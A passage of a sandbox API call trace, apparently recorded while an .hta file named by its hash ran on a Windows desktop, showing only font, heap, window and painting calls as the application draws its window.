(hdc=0x4010b37, lpLogfont="Times New Roman", lpProc=0x7feef8ae8b0, lParam=0x30d9b0) returned 1 [0074.060] CreateFontIndirectW (lplf=0x30d920) returned 0x3c0a0b5c [0074.060] SelectObject (hdc=0x4010b37, h=0x3c0a0b5c) returned 0x18a002e [0074.060] GetTextMetricsW (in: hdc=0x4010b37, lptm=0x30d810 | out: lptm=0x30d810) returned 1 [0074.065] GetOutlineTextMetricsW (in: hdc=0x4010b37, cjCopy=0xe8, potm=0x30d6e0 | out: potm=0x30d6e0) returned 0xe8 [0074.066] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x3c0a0b5c [0074.066] SelectObject (hdc=0x4010b37, h=0x3c0a0b5c) returned 0x18a002e [0074.066] GetTextFaceW (in: hdc=0x4010b37, c=32, lpName=0x30da40 | out: lpName="Times New Roman") returned 16 [0074.066] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x3c0a0b5c [0074.066] SelectObject (hdc=0x4010b37, h=0x3c0a0b5c) returned 0x18a002e [0074.066] GetTextCharsetInfo (in: hdc=0x4010b37, lpSig=0x30d960, dwFlags=0x0 | out: lpSig=0x30d960) returned 0 [0074.066] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x3c0a0b5c [0074.066] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x10) returned 0x2ec2020 [0074.066] SelectObject (hdc=0x4010b37, h=0x3c0a0b5c) returned 0x18a002e [0074.066] GetFontUnicodeRanges (in: hdc=0x4010b37, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0074.067] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.067] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x27c) returned 0x45a920 [0074.067] GetFontUnicodeRanges (in: hdc=0x4010b37, lpgs=0x45a920 | out: lpgs=0x45a920) returned 0x27c [0074.067] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x3c0a0b5c [0074.067] SelectObject (hdc=0x4010b37, h=0x3c0a0b5c) returned 0x18a002e [0074.067] GetCharWidth32W (in: hdc=0x4010b37, iFirst=0x20, iLast=0x7e, lpBuffer=0x30d9f0 | out: lpBuffer=0x30d9f0) returned 1 [0074.069] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x17c) returned 0x2edad10 [0074.069] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x800) returned 0x4477d0 [0074.070] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x3c0a0b5c [0074.429] LsQueryLineDup () returned 0x0 [0074.429] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf0) returned 0x439a50 [0074.783] LsDestroyLine () returned 0x0 [0074.783] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.784] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x445b10 [0074.784] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x448010 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edf100 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.785] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.786] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.786] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.786] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.786] IntersectRect (in: lprcDst=0x30ef70, lprcSrc1=0x30ef70, lprcSrc2=0x30ef40 | out: lprcDst=0x30ef70) returned 1 [0074.786] IntersectRect (in: lprcDst=0x45c5a0, lprcSrc1=0x45c5a0, lprcSrc2=0x30ef60 | out: lprcDst=0x45c5a0) returned 1 [0074.786] IntersectRect (in: lprcDst=0x45c5a0, lprcSrc1=0x45c5a0, lprcSrc2=0x30ef80 | out: lprcDst=0x45c5a0) returned 1 [0074.786] IntersectRect (in: lprcDst=0x30eb90, lprcSrc1=0x30eb90, lprcSrc2=0x30eb60 | out: lprcDst=0x30eb90) returned 1 [0074.786] IntersectRect (in: lprcDst=0x45c5a0, lprcSrc1=0x45c5a0, lprcSrc2=0x30eb80 | out: lprcDst=0x45c5a0) returned 1 [0074.786] IntersectRect (in: lprcDst=0x45c5a0, lprcSrc1=0x45c5a0, lprcSrc2=0x30eba0 | out: lprcDst=0x45c5a0) returned 1 [0074.787] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.787] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ea90, lprcSrc1=0x30ea90, lprcSrc2=0x45c590 | out: lprcDst=0x30ea90) returned 1 [0074.787] UnionRect (in: lprcDst=0x30edf0, lprcSrc1=0x30edf0, lprcSrc2=0x30ed80 | out: lprcDst=0x30edf0) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed80, lprcSrc1=0x30ed80, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ed80) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ea50, lprcSrc1=0x30ea50, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ea50) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed00, lprcSrc1=0x30ed00, lprcSrc2=0x30ea50 | out: lprcDst=0x30ed00) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed80, lprcSrc1=0x30ed80, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ed80) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed80, lprcSrc1=0x30ed80, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ed80) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ea50, lprcSrc1=0x30ea50, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ea50) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed00, lprcSrc1=0x30ed00, lprcSrc2=0x30ea50 | out: lprcDst=0x30ed00) returned 1 [0074.787] IntersectRect (in: lprcDst=0x30ed80, lprcSrc1=0x30ed80, lprcSrc2=0x30ecf0 | out: lprcDst=0x30ed80) returned 1 [0074.787] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0074.788] UnionRect (in: lprcDst=0x30f1d0, lprcSrc1=0x30f1d0, lprcSrc2=0x30f160 | out: lprcDst=0x30f1d0) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x44c3d0 [0074.788] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.788] RedrawWindow (hWnd=0x20316, lprcUpdate=0x30f2f0, hrgnUpdate=0x0, flags=0x21) returned 1 [0074.789] GetFocus () returned 0x20316 [0074.789] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x2ec2040 [0074.789] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8) returned 0x2eaef20 [0074.789] GetFocus () returned 0x20316 [0074.789] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.790] GetCapture () returned 0x0 [0074.790] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x448060 [0074.790] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.790] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x4480b0 [0074.790] GetCurrentThreadId () returned 0xf14 [0074.791] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.791] GetCurrentThreadId () returned 0xf14 [0074.791] GetCurrentThreadId () returned 0xf14 [0074.791] GetFocus () returned 0x20316 [0074.791] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.791] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.791] GetCurrentThreadId () returned 0xf14 [0074.792] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.792] GetCurrentThreadId () returned 0xf14 [0074.792] GetCurrentThreadId () returned 0xf14 [0074.792] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x2eb5d70, Size=0x1c8) returned 0x2eb5d70 [0074.793] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.793] GetCapture () returned 0x0 [0074.793] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.793] GetCurrentThreadId () returned 0xf14 [0074.794] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.794] GetCurrentThreadId () returned 0xf14 [0074.794] GetCurrentThreadId () returned 0xf14 [0074.794] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.794] GetCapture () returned 0x0 [0074.794] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.794] GetCurrentThreadId () returned 0xf14 [0074.795] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.795] GetCurrentThreadId () returned 0xf14 [0074.795] GetCurrentThreadId () returned 0xf14 [0074.795] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.795] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.796] GetCurrentThreadId () returned 0xf14 [0074.796] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.796] GetCurrentThreadId () returned 0xf14 [0074.796] GetCurrentThreadId () returned 0xf14 [0074.796] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ed80 | out: lpPoint=0x30ed80) returned 1 [0074.796] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.797] GetCurrentThreadId () returned 0xf14 [0074.797] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.797] GetCurrentThreadId () returned 0xf14 [0074.797] GetCurrentThreadId () returned 0xf14 [0074.797] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4480b0 | out: hHeap=0x3f0000) returned 1 [0074.797] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ec2040 | out: hHeap=0x3f0000) returned 1 [0074.798] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x448060 | out: hHeap=0x3f0000) returned 1 [0074.798] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2eaef20 | out: hHeap=0x3f0000) returned 1 [0074.798] GetCurrentThreadId () returned 0xf14 [0074.798] GetFocus () returned 0x20316 [0074.798] GetFocus () returned 0x20316 [0074.798] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30f2b0 | out: ppu=0x30f2b0) returned 0x0 [0074.798] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0074.798] IUri:GetAbsoluteUri (in: This=0x44ef70, pbstrAbsoluteUri=0x30f398 | out: pbstrAbsoluteUri=0x30f398*="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0074.798] IUnknown:Release (This=0x44ef70) returned 0x3 [0074.799] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x7feff1e0000 [0074.800] GetProcAddress (hModule=0x7feff1e0000, lpProcName="VariantClear") returned 0x7feff1e1180 [0074.800] ShouldShowIntranetWarningSecband () returned 0x0 [0074.815] GetIUriPriv () returned 0x0 [0074.815] IUnknown:Release (This=0x44ef70) returned 0x3 [0074.815] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30f050 | out: lpPoint=0x30f050) returned 1 [0074.815] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0074.816] GetCurrentThreadId () returned 0xf14 [0074.816] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0074.816] GetCurrentThreadId () returned 0xf14 [0074.816] GetCurrentThreadId () returned 0xf14 [0074.816] GetFocus () returned 0x20316 [0074.816] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30f2d0 | out: lpPoint=0x30f2d0) returned 1 [0074.816] GetClientRect (in: hWnd=0x20316, lpRect=0x30f2b0 | out: lpRect=0x30f2b0) returned 1 [0074.817] LoadStringW (in: hInstance=0x7fef3310000, uID=0x1fe9, lpBuffer=0x30efb0, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0074.817] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459430 | out: hHeap=0x3f0000) returned 1 [0074.817] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e37d0 | out: hHeap=0x3f0000) returned 1 [0074.818] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0074.818] IUri:GetScheme (in: This=0x44ef70, pdwScheme=0x30e2e8 | out: pdwScheme=0x30e2e8*=0x9) returned 0x0 [0074.818] IUnknown:QueryInterface (in: This=0x44ef70, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30e2b0 | out: ppvObject=0x30e2b0*=0x44ef70) returned 0x0 [0074.818] IUnknown:Release (This=0x44ef70) returned 0x4 [0074.818] IUnknown:AddRef (This=0x44ef70) returned 0x5 [0074.818] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pszPath=0x30e350, pcchPath=0x30e300, dwFlags=0x0 | out: pszPath="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pcchPath=0x30e300) returned 0x0 [0074.818] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc2) returned 0x459430 [0074.818] IUnknown:Release (This=0x44ef70) returned 0x4 [0074.818] GetWindowTextW (in: hWnd=0x40106, lpString=0x30de60, nMaxCount=512 | out: lpString="") returned 0 [0074.818] SetWindowTextW (hWnd=0x40106, lpString="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 1 [0075.520] IUnknown:Release (This=0x44ef70) returned 0x3 [0075.521] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459430 | out: hHeap=0x3f0000) returned 1 [0075.521] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0075.521] SendMessageW (hWnd=0x60020, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0075.526] SendMessageW (hWnd=0x40106, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0075.527] SetWindowLongW (hWnd=0x40106, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0076.104] SetWindowLongW (hWnd=0x40106, nIndex=-20, dwNewLong=262144) returned 262400 [0076.105] SetWindowPos (hWnd=0x40106, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0076.109] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.109] SetPropW (hWnd=0x60020, lpString=0x0, hData=0x60020) returned 0 [0076.109] ShowWindow (hWnd=0x40106, nCmdShow=1) returned 0 [0076.149] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0076.150] GetCurrentThreadId () returned 0xf14 [0076.150] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0076.150] WindowFromDC (hDC=0x6010b40) returned 0x20316 [0076.163] GetDeviceCaps (hdc=0x4010b37, index=38) returned 32409 [0076.163] IntersectRect (in: lprcDst=0x30e850, lprcSrc1=0x459d98, lprcSrc2=0x459d88 | out: lprcDst=0x30e850) returned 1 [0076.163] IntersectRect (in: lprcDst=0x30e840, lprcSrc1=0x30e840, lprcSrc2=0x30e720 | out: lprcDst=0x30e840) returned 0 [0076.163] IsRectEmpty (lprc=0x30e840) returned 1 [0076.163] GetClipBox (in: hdc=0x6010b40, lprect=0x30e840 | out: lprect=0x30e840) returned 2 [0076.163] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x78) returned 0x414f80 [0076.163] GetViewportOrgEx (in: hdc=0x6010b40, lppoint=0x30e6d0 | out: lppoint=0x30e6d0) returned 1 [0077.109] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30e380 | out: lprcDst=0x45c420) returned 1 [0077.109] IntersectRect (in: lprcDst=0x30e400, lprcSrc1=0x30e400, lprcSrc2=0x30e3d0 | out: lprcDst=0x30e400) returned 1 [0077.109] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30e3f0 | out: lprcDst=0x45c420) returned 1 [0077.109] GetObjectType (h=0x6010b40) returned 0x3 [0077.109] GetDeviceCaps (hdc=0x6010b40, index=2) returned 1 [0077.110] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x2edd290 [0077.110] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x2edd290) returned 0xd040b3e [0077.110] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd290 | out: hHeap=0x3f0000) returned 1 [0077.110] SelectClipRgn (hdc=0x6010b40, hrgn=0xd040b3e) returned 2 [0077.110] DeleteObject (ho=0xd040b3e) returned 1 [0077.111] CreateSolidBrush (color=0xffffff) returned 0x44100b60 [0077.111] SelectObject (hdc=0x6010b40, h=0x44100b60) returned 0x1900010 [0077.111] PatBlt (hdc=0x6010b40, x=0, y=0, w=1064, h=587, rop=0xf00021) returned 1 [0077.111] SelectObject (hdc=0x6010b40, h=0x1900010) returned 0x44100b60 [0077.111] SelectClipRgn (hdc=0x6010b40, hrgn=0x0) returned 2 [0077.111] SetViewportOrgEx (in: hdc=0x6010b40, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0077.111] GetCurrentThreadId () returned 0xf14 [0077.111] GetCurrentThreadId () returned 0xf14 [0077.113] GetClientRect (in: hWnd=0x40106, lpRect=0x30ea90 | out: lpRect=0x30ea90) returned 1 [0077.113] GetClientRect (in: hWnd=0x40106, lpRect=0x30eac0 | out: lpRect=0x30eac0) returned 1 [0077.113] UpdateWindow (hWnd=0x40106) returned 1 [0077.114] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0077.114] GetCurrentThreadId () returned 0xf14 [0077.114] GetCurrentThreadId () returned 0xf14 [0077.114] GetCurrentThreadId () returned 0xf14 [0077.114] MapWindowPoints (in: hWndFrom=0x20316, hWndTo=0x0, lpPoints=0x30e380, cPoints=0x1 | out: lpPoints=0x30e380) returned 13435063 [0077.114] BeginPaint (in: hWnd=0x20316, lpPaint=0x30e800 | out: lpPaint=0x30e800) returned 0x1a010b3a [0077.114] IsRectEmpty (lprc=0x30e80c) returned 0 [0077.114] CreateRectRgnIndirect (lprect=0x7feeff1a200) returned 0xf040b3e [0077.114] GetRandomRgn (hdc=0x1a010b3a, hrgn=0xf040b3e, i=4) returned 1 [0077.115] OffsetRgn (hrgn=0xf040b3e, x=-183, y=-205) returned 2 [0077.115] MapWindowPoints (in: hWndFrom=0x20316, hWndTo=0x0, lpPoints=0x30e378, cPoints=0x1 | out: lpPoints=0x30e378) returned 13435063 [0077.115] GetDeviceCaps (hdc=0x4010b37, index=38) returned 32409 [0077.115] IntersectRect (in: lprcDst=0x30e450, lprcSrc1=0x459d98, lprcSrc2=0x459d88 | out: lprcDst=0x30e450) returned 1 [0077.115] IntersectRect (in: lprcDst=0x30e440, lprcSrc1=0x30e440, lprcSrc2=0x30e2f0 | out: lprcDst=0x30e440) returned 0 [0077.115] IsRectEmpty (lprc=0x30e440) returned 1 [0077.116] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414f80 | out: hHeap=0x3f0000) returned 1 [0077.116] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x78) returned 0x414f80 [0077.116] GetDeviceCaps (hdc=0x4010b37, index=38) returned 32409 [0077.116] GetDeviceCaps (hdc=0x1a010b3a, index=14) returned 1 [0077.116] GetDeviceCaps (hdc=0x1a010b3a, index=12) returned 32 [0077.116] GetRegionData (in: hrgn=0xf040b3e, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0077.116] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x2edd290 [0077.116] GetRegionData (in: hrgn=0xf040b3e, nCount=0x30, lpRgnData=0x2edd290 | out: lpRgnData=0x2edd290) returned 0x30 [0077.116] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x448060 [0077.116] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x448060 | out: hHeap=0x3f0000) returned 1 [0077.117] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd290 | out: hHeap=0x3f0000) returned 1 [0077.117] IntersectRect (in: lprcDst=0x30b7e0, lprcSrc1=0x30b7e0, lprcSrc2=0x30b7b0 | out: lprcDst=0x30b7e0) returned 1 [0077.117] IntersectRect (in: lprcDst=0x30b6e0, lprcSrc1=0x30b6e0, lprcSrc2=0x30b6b0 | out: lprcDst=0x30b6e0) returned 1 [0079.785] IntersectRect (in: lprcDst=0x30b540, lprcSrc1=0x30b540, lprcSrc2=0x30b530 | out: lprcDst=0x30b540) returned 1 [0079.785] GetObjectType (h=0x1a010b3a) returned 0x3 [0079.785] GetDeviceCaps (hdc=0x1a010b3a, index=2) returned 1 [0079.786] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x2edd290 [0079.786] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x2edd290) returned 0x16040b46 [0079.787] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd290 | out: hHeap=0x3f0000) returned 1 [0079.787] SelectClipRgn (hdc=0x1a010b3a, hrgn=0x16040b46) returned 2 [0079.787] DeleteObject (ho=0x16040b46) returned 1 [0079.787] sqrtf (_X=0x45c3d0) returned 0x38800000 [0079.787] sqrtf (_X=0x38d1b717) returned 0x38800000 [0079.787] atan2f (_Y=0x38d1b717, _X=0x7f800000) returned 0x3f8 [0079.787] atan2f (_Y=0x0, _X=0x3f847ae140000000) returned 0x8001f [0079.788] GetStockObject (i=8) returned 0x1b00016 [0079.788] SelectObject (hdc=0x1a010b3a, h=0x1b00016) returned 0x1b00017 [0079.788] GetViewportOrgEx (in: hdc=0x1a010b3a, lppoint=0x30aef8 | out: lppoint=0x30aef8) returned 1 [0079.788] CreateSolidBrush (color=0xa0a0a0) returned 0x31100258 [0079.788] SelectObject (hdc=0x1a010b3a, h=0x31100258) returned 0x1900010 [0079.788] UnrealizeObject (h=0x31100258) returned 1 [0079.788] SetBrushOrgEx (in: hdc=0x1a010b3a, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0079.788] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.788] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.788] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.788] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.788] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.788] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.788] Polygon (hdc=0x1a010b3a, apt=0x30afe0, cpt=6) returned 1 [0079.789] SelectObject (hdc=0x1a010b3a, h=0x44100b60) returned 0x31100258 [0079.789] UnrealizeObject (h=0x44100b60) returned 1 [0079.789] SetBrushOrgEx (in: hdc=0x1a010b3a, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0079.790] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.790] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.790] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.790] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0079.790] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.790] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.790] Polygon (hdc=0x1a010b3a, apt=0x30afe0, cpt=8) returned 1 [0079.803] CreateSolidBrush (color=0x696969) returned 0x1410026e [0079.803] SelectObject (hdc=0x1a010b3a, h=0x1410026e) returned 0x44100b60 [0079.803] UnrealizeObject (h=0x1410026e) returned 1 [0079.803] SetBrushOrgEx (in: hdc=0x1a010b3a, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0079.803] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.803] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.803] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.803] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.803] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.803] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.803] Polygon (hdc=0x1a010b3a, apt=0x30afe0, cpt=6) returned 1 [0079.804] CreateSolidBrush (color=0xe3e3e3) returned 0xc100b5d [0079.804] SelectObject (hdc=0x1a010b3a, h=0xc100b5d) returned 0x1410026e [0079.804] UnrealizeObject (h=0xc100b5d) returned 1 [0079.804] SetBrushOrgEx (in: hdc=0x1a010b3a, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0079.804] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.804] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.804] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.804] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0079.804] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.804] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0079.804] Polygon (hdc=0x1a010b3a, apt=0x30afe0, cpt=8) returned 1 [0079.805] SelectObject (hdc=0x1a010b3a, h=0x1900010) returned 0xc100b5d [0079.805] IntersectRect (in: lprcDst=0x30b5c0, lprcSrc1=0x30b5c0, lprcSrc2=0x45c430 | out: lprcDst=0x30b5c0) returned 1 [0079.805] GetDeviceCaps (hdc=0x1a010b3a, index=2) returned 1 [0079.806] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x30) returned 0x2edd290 [0079.806] LoadLibraryA (lpLibFileName="UxTheme.dll") returned 0x7fefc070000 [0079.807] GetProcAddress (hModule=0x7fefc070000, lpProcName="IsAppThemed") returned 0x7fefc07f9a0 [0079.807] IsAppThemed () returned 0x1 [0079.807] GetProcAddress (hModule=0x7fefc070000, lpProcName=0x3d) returned 0x7fefc096700 [0079.807] OpenThemeDataEx () returned 0x30002 [0079.810] GetProcAddress (hModule=0x7fefc070000, lpProcName="DrawThemeBackground") returned 0x7fefc071ed0 [0079.810] DrawThemeBackground () returned 0x0 [0079.810] DrawThemeBackground () returned 0x0 [0079.811] DrawThemeBackground () returned 0x0 [0079.811] IntersectRect (in: lprcDst=0x30b660, 